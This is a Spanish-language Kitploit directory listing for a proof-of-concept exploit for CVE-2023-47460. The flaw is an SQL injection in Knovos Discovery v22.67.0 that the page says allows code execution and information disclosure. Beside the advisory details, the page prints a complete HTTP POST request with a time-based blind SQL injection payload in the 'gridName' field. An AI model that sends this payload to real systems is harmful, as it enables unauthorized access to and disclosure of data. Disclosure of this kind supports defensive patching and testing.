Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-47460 — Exploit de prueba de concepto para inyección SQL en Knovos Discovery v22.67.0 a través del endpoint /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure, permitiendo ejecución remota de código y divulgación de información. | Kitploit
Herramientas/GitHubGitHub/aleksey-vi/cve-2023-47460
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubaleksey-vi/cve-2023-47460

CVE-2023-47460

Exploit de prueba de concepto para inyección SQL en Knovos Discovery v22.67.0 a través del endpoint /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure, permitiendo ejecución remota de código y divulgación de información.

Ver Repositorio
1hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-47460

Descripción

Vulnerabilidad de inyección SQL en Knovos Discovery v.22.67.0 permite a un atacante remoto ejecutar código arbitrario a través del componente /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

Tipo de Vulnerabilidad

Inyección SQL

Proveedor del Producto

Knovos Discovery

Código base del producto afectado

Versión 22.67.0 - Versión 22.67.0

Componente Afectado

/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

Tipo de Ataque

Remoto

Impacto Ejecución de código

verdadero

Impacto Divulgación de información

verdadero

Descubridor

  • Aleksey Vistorobskiy

Vectores de Ataque

usuario autorizado

Solicitud:

root@kitploit:~
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

{
  "gridName":"Inventory-grid' waitfor delay'0:0:50'--",
  "uID":"10"
}

Respuesta:

Referencia

  • https://www.knovos.com/
  • https://github.com/aleksey-vi/CVE-2023-47460
Descargar herramienta